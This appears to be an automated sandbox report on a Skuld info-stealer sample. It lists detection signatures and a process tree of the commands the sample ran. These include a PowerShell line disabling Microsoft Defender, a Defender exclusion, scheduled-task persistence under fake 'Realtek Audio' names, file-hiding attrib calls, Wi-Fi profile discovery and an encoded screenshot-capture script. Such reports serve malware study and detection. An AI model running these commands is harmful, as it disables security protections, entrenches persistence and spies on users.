Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    07/08/2026, 23:47

General

  • Target
    2026-08-07_8ab88c2183caaf622831478f54d85cdc_coinminer_dosia_glassworm_ngrbot_poet-rat_quasar-rat_snatch.exe
  • Size 15.3MB
  • Sample260807-3syd2sysfw
  • SHA256 02994a804f39c8f5d73cdec837ae731f7e6c0dd7f9a6a73be0c1ec057d81aaee
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Family: Skuld stealer

    An info stealer written in Go lang.

  • Detects SkuldStealer 1 IoCs
  • Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 1 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers 1 IoCs
  • Detects executables Discord URL observed in first stage droppers 1 IoCs
  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • Detects executables containing URLs to raw contents of a Github gist 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Disables one or more Microsoft Defender components 1 TTPs 1 IoCs

    Uses the Powershell Set-MpPreference cmdlet to disable one or more Microsoft Defender components.

  • Drops file in Drivers directory 3 IoCs
  • Creates a file in the Startup directory 1 TTPs 2 IoCs

    A file was written to a Windows startup folder. Files in these directories are executed automatically when a user logs on or an application initializes.

  • Executes dropped EXE 20 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Contacts third-party web service commonly abused for C2 1 TTPs 3 IoCs

    Legitimate web (hosting) services can be abused by malware authors to host malware or C2s.

  • Looks up external IP address via web service 1 TTPs 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 26 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 26 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-08-07_8ab88c2183caaf622831478f54d85cdc_coinminer_dosia_glassworm_ngrbot_poet-rat_quasar-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-08-07_8ab88c2183caaf622831478f54d85cdc_coinminer_dosia_glassworm_ngrbot_poet-rat_quasar-rat_snatch.exe"
    1⤵
    • Drops file in Drivers directory
    • Creates a file in the Startup directory
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\2026-08-07_8ab88c2183caaf622831478f54d85cdc_coinminer_dosia_glassworm_ngrbot_poet-rat_quasar-rat_snatch.exe
      2⤵
      • Views/modifies file attributes
      PID:5116
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3956
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4508
    • C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      2⤵
        PID:60
      • C:\Windows\System32\Wbem\wmic.exe
        wmic path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:2752
      • C:\Windows\system32\netsh.exe
        netsh wlan show profiles
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:2068
      • C:\Windows\system32\schtasks.exe
        schtasks /create /tn "Realtek Audio Update" /tr C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe /sc onlogon /f /rl highest
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1932
      • C:\Windows\system32\schtasks.exe
        schtasks /create /tn "Realtek Audio Watchdog" /tr "wscript.exe \"C:\Users\Admin\AppData\Roaming\Microsoft\Protect\RealtekAudioUpdate.vbs\"" /sc minute /mo 15 /f /rl highest
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4568
      • C:\Windows\system32\schtasks.exe
        schtasks /create /tn "Realtek Audio Watcher" /tr C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthWatcher.exe /sc onlogon /f /rl highest
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3000
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        2⤵
        • Views/modifies file attributes
        PID:2104
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
        2⤵
        • Views/modifies file attributes
        PID:2352
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\ProgramData\Microsoft\SecurityHealthSystray.exe
        2⤵
        • Views/modifies file attributes
        PID:4252
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthWatcher.exe
        2⤵
        • Views/modifies file attributes
        PID:3828
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
        2⤵
        • Views/modifies file attributes
        PID:2084
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
        2⤵
        • Views/modifies file attributes
        PID:3460
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
        2⤵
        • Views/modifies file attributes
        PID:3024
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
        2⤵
        • Views/modifies file attributes
        PID:3184
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect
        2⤵
        • Views/modifies file attributes
        PID:2996
      • C:\Windows\system32\attrib.exe
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RealtekAudioUpdate.vbs"
        2⤵
        • Creates a file in the Startup directory
        • Views/modifies file attributes
        PID:3120
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
        C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
        2⤵
        • Executes dropped EXE
        PID:3720
      • C:\ProgramData\Microsoft\SecurityHealthSystray.exe
        C:\ProgramData\Microsoft\SecurityHealthSystray.exe
        2⤵
        • Executes dropped EXE
        PID:4500
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
        C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
        2⤵
        • Executes dropped EXE
        PID:3916
      • C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
        C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
        2⤵
        • Executes dropped EXE
        PID:648
      • C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
        C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
        2⤵
        • Executes dropped EXE
        PID:2740
      • C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
        C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2632
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
          3⤵
          • Views/modifies file attributes
          PID:4152
      • C:\Windows\System32\Wbem\wmic.exe
        wmic os get Caption
        2⤵
          PID:2108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2026-08-07_8ab88c2183caaf622831478f54d85cdc_coinminer_dosia_glassworm_ngrbot_poet-rat_quasar-rat_snatch.exe
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1604
        • C:\Windows\System32\Wbem\wmic.exe
          wmic cpu get Name
          2⤵
            PID:4484
          • C:\Windows\System32\Wbem\wmic.exe
            wmic path win32_VideoController get name
            2⤵
            • Detects videocard installed
            PID:1676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Disables one or more Microsoft Defender components
            • Suspicious behavior: EnumeratesProcesses
            PID:1100
          • C:\Windows\System32\Wbem\wmic.exe
            wmic csproduct get UUID
            2⤵
              PID:5080
            • C:\Windows\system32\attrib.exe
              attrib -r C:\Windows\System32\drivers\etc\hosts
              2⤵
              • Drops file in Drivers directory
              • Views/modifies file attributes
              PID:3064
            • C:\Windows\system32\attrib.exe
              attrib +r C:\Windows\System32\drivers\etc\hosts
              2⤵
              • Drops file in Drivers directory
              • Views/modifies file attributes
              PID:3336
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:2756
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              2⤵
                PID:4356
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5e0odphh\5e0odphh.cmdline"
                  3⤵
                    PID:1876
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES209E.tmp" "c:\Users\Admin\AppData\Local\Temp\5e0odphh\CSC6E70738DF081466195C62FF3BD482A.TMP"
                      4⤵
                        PID:3388
                • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:116
                  • C:\Windows\system32\attrib.exe
                    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                    2⤵
                    • Views/modifies file attributes
                    PID:1580
                  • C:\Windows\System32\Wbem\wmic.exe
                    wmic csproduct get UUID
                    2⤵
                      PID:1772
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
                      C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
                      2⤵
                      • Executes dropped EXE
                      PID:552
                    • C:\ProgramData\Microsoft\SecurityHealthSystray.exe
                      C:\ProgramData\Microsoft\SecurityHealthSystray.exe
                      2⤵
                      • Executes dropped EXE
                      PID:2920
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
                      C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthWatcher.exe
                      2⤵
                      • Executes dropped EXE
                      PID:4496
                    • C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
                      C:\ProgramData\Microsoft\SecurityHealthWatcher.exe
                      2⤵
                      • Executes dropped EXE
                      PID:1104
                    • C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
                      C:\Users\Admin\Microsoft\SecurityHealthWatcher.exe
                      2⤵
                      • Executes dropped EXE
                      PID:4812
                    • C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
                      C:\Users\Admin\AppData\Local\Temp\SecurityHealthWatcher.exe
                      2⤵
                      • Executes dropped EXE
                      PID:1468
                    • C:\Windows\System32\Wbem\wmic.exe
                      wmic os get Caption
                      2⤵
                        PID:1460
                      • C:\Windows\System32\Wbem\wmic.exe
                        wmic cpu get Name
                        2⤵
                          PID:3212
                        • C:\Windows\System32\Wbem\wmic.exe
                          wmic path win32_VideoController get name
                          2⤵
                          • Detects videocard installed
                          PID:1876
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:3916
                        • C:\Windows\System32\Wbem\wmic.exe
                          wmic csproduct get UUID
                          2⤵
                            PID:4672
                          • C:\Windows\System32\Wbem\wmic.exe
                            wmic os get Caption
                            2⤵
                              PID:4620
                            • C:\Windows\System32\Wbem\wmic.exe
                              wmic cpu get Name
                              2⤵
                                PID:5072
                              • C:\Windows\System32\Wbem\wmic.exe
                                wmic path win32_VideoController get name
                                2⤵
                                • Detects videocard installed
                                PID:5088
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show profiles
                                2⤵
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Network Configuration Discovery: Wi-Fi Discovery
                                PID:1844
                              • C:\Windows\System32\Wbem\wmic.exe
                                wmic csproduct get UUID
                                2⤵
                                  PID:3212
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic os get Caption
                                  2⤵
                                    PID:2784
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    wmic cpu get Name
                                    2⤵
                                      PID:3516
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic path win32_VideoController get name
                                      2⤵
                                      • Detects videocard installed
                                      PID:5048
                                    • C:\Windows\system32\netsh.exe
                                      netsh wlan show profiles
                                      2⤵
                                      • Event Triggered Execution: Netsh Helper DLL
                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                      PID:4328
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic csproduct get UUID
                                      2⤵
                                        PID:5000
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        wmic os get Caption
                                        2⤵
                                          PID:3296
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          wmic cpu get Name
                                          2⤵
                                            PID:3020
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            wmic path win32_VideoController get name
                                            2⤵
                                            • Detects videocard installed
                                            PID:3336
                                          • C:\Windows\system32\netsh.exe
                                            netsh wlan show profiles
                                            2⤵
                                            • Event Triggered Execution: Netsh Helper DLL
                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                            PID:3224
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            wmic csproduct get UUID
                                            2⤵
                                              PID:4684
                                            • C:\Windows\System32\Wbem\wmic.exe
                                              wmic os get Caption
                                              2⤵
                                                PID:4344
                                              • C:\Windows\System32\Wbem\wmic.exe
                                                wmic cpu get Name
                                                2⤵
                                                  PID:1612
                                                • C:\Windows\System32\Wbem\wmic.exe
                                                  wmic path win32_VideoController get name
                                                  2⤵
                                                  • Detects videocard installed
                                                  PID:1668
                                                • C:\Windows\system32\netsh.exe
                                                  netsh wlan show profiles
                                                  2⤵
                                                  • Event Triggered Execution: Netsh Helper DLL
                                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                                  PID:2456
                                                • C:\Windows\System32\Wbem\wmic.exe
                                                  wmic csproduct get UUID
                                                  2⤵
                                                    PID:4196
                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                    wmic os get Caption
                                                    2⤵
                                                      PID:3544
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      wmic cpu get Name
                                                      2⤵
                                                        PID:4492
                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                        wmic path win32_VideoController get name
                                                        2⤵
                                                        • Detects videocard installed
                                                        PID:4276
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh wlan show profiles
                                                        2⤵
                                                        • Event Triggered Execution: Netsh Helper DLL
                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                        PID:5048
                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                        wmic csproduct get UUID
                                                        2⤵
                                                          PID:5088
                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                          wmic os get Caption
                                                          2⤵
                                                            PID:4280
                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                            wmic cpu get Name
                                                            2⤵
                                                              PID:3004
                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                              wmic path win32_VideoController get name
                                                              2⤵
                                                              • Detects videocard installed
                                                              PID:2456
                                                            • C:\Windows\system32\netsh.exe
                                                              netsh wlan show profiles
                                                              2⤵
                                                              • Event Triggered Execution: Netsh Helper DLL
                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                              PID:4944
                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                              wmic csproduct get UUID
                                                              2⤵
                                                                PID:3788
                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                wmic os get Caption
                                                                2⤵
                                                                  PID:5060
                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                  wmic cpu get Name
                                                                  2⤵
                                                                    PID:4536
                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                    wmic path win32_VideoController get name
                                                                    2⤵
                                                                    • Detects videocard installed
                                                                    PID:4624
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh wlan show profiles
                                                                    2⤵
                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                    PID:2708
                                                                • C:\Windows\system32\wscript.exe
                                                                  wscript.exe
                                                                  1⤵
                                                                    PID:1304
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthWatcher.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthWatcher.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:364
                                                                    • C:\Windows\system32\attrib.exe
                                                                      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthWatcher.exe
                                                                      2⤵
                                                                      • Views/modifies file attributes
                                                                      PID:4820
                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
                                                                      C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4524
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +h +s C:\Users\Admin\AppData\Local\Microsoft\Windows\SecurityHealthSystray.exe
                                                                        3⤵
                                                                        • Views/modifies file attributes
                                                                        PID:4348
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        wmic csproduct get UUID
                                                                        3⤵
                                                                          PID:3876
                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                          wmic os get Caption
                                                                          3⤵
                                                                            PID:3248
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic cpu get Name
                                                                            3⤵
                                                                              PID:4672
                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                              wmic path win32_VideoController get name
                                                                              3⤵
                                                                              • Detects videocard installed
                                                                              PID:5088
                                                                            • C:\Windows\system32\netsh.exe
                                                                              netsh wlan show profiles
                                                                              3⤵
                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                              PID:1732
                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                              wmic csproduct get UUID
                                                                              3⤵
                                                                                PID:2860
                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                wmic os get Caption
                                                                                3⤵
                                                                                  PID:3244
                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                  wmic cpu get Name
                                                                                  3⤵
                                                                                    PID:1212
                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                    wmic path win32_VideoController get name
                                                                                    3⤵
                                                                                    • Detects videocard installed
                                                                                    PID:4100
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh wlan show profiles
                                                                                    3⤵
                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                    PID:1752
                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                    wmic csproduct get UUID
                                                                                    3⤵
                                                                                      PID:608
                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                      wmic os get Caption
                                                                                      3⤵
                                                                                        PID:2188
                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                        wmic cpu get Name
                                                                                        3⤵
                                                                                          PID:3864
                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                          wmic path win32_VideoController get name
                                                                                          3⤵
                                                                                          • Detects videocard installed
                                                                                          PID:3916
                                                                                        • C:\Windows\system32\netsh.exe
                                                                                          netsh wlan show profiles
                                                                                          3⤵
                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                          PID:5116
                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                          wmic csproduct get UUID
                                                                                          3⤵
                                                                                            PID:3688
                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                            wmic os get Caption
                                                                                            3⤵
                                                                                              PID:4484
                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                              wmic cpu get Name
                                                                                              3⤵
                                                                                                PID:4624
                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                wmic path win32_VideoController get name
                                                                                                3⤵
                                                                                                • Detects videocard installed
                                                                                                PID:4336
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                netsh wlan show profiles
                                                                                                3⤵
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                PID:2084
                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                wmic csproduct get UUID
                                                                                                3⤵
                                                                                                  PID:1640
